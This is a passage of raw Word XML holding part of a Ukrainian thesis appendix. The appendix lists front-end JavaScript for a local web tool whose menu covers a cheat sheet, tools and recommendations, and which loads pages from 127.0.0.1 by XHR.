        <w:t xml:space="preserve">        &lt;li class="menu"&gt;&lt;a href="#tools" id="tools" onclick="tools_class()" &gt;tools&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F8FEFE" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;li class="menu"&gt;&lt;a href="#recomendation" id="recomendation" onclick="recomendation_class()"&gt;recomendation&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AFDFC" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995F371" w14:textId="56CB1788" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A923C0" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD2D3A" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694CF7EA" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      var div_el = document.createElement('div'); //create div element for menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CFB0C9" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      div_el.id = 'div_for_all'; // set data in this id XHR request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDF49F" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      div_el.setAttribute("class","SQLi_div")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2DBE71" w14:textId="4852AE39" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      document.body.appendChild(div_el);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFD7BB" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      function cheat_sheet_class(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6034033D" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("cheat_sheet").className = "active";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D20FD" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("tools").className = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63975DFA" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("recomendation").className = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FD3861" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D68C50B" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        var request = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C0EBD" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.open("GET", "http://127.0.0.1:8000/cheat_sheet/", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE3709" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.send(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03822DF6" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.onreadystatechange = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429FA1A" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (request.readyState == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C9914" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var parser = new DOMParser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663961BD" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var doc = parser.parseFromString(request.responseText, "text/html");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426788D2" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var elem = doc.getElementById("cheat_sheet_tables");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F8AF1E" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                document.getElementById("div_for_all").innerHTML = elem.innerHTML;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1762C8AC" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D39870" w14:textId="26F2972D" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BDF66" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("output_com_exec").style.visibility = "hidden"; // textarea element for command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7506164E" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592AEC4" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67475591" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AA76A4" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      function tools_class(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063C6E1" w14:textId="2DDA7C6A" w:rsidR="00A75083" w:rsidRPr="00A75083" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Продовження додатку А</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1B82E" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449638AF" w14:textId="5FBBBE29" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.getElementById("cheat_sheet").className = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520979E0" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("tools").className = "active";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50955A38" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("recomendation").className = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB2FA00" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492D9BCE" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        var height = document.querySelector("#output_com_exec").scrollHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF0473" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("output_com_exec").style.height = height; //change height textarea when scanne output result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1AAF15" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BB837B" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        var request = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AFF122" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.open("GET", "http://127.0.0.1:8000/comand_exec/", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C26AF5" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.send(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E2F64" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.onreadystatechange = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BCE8DF" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (request.readyState == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E68D0" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
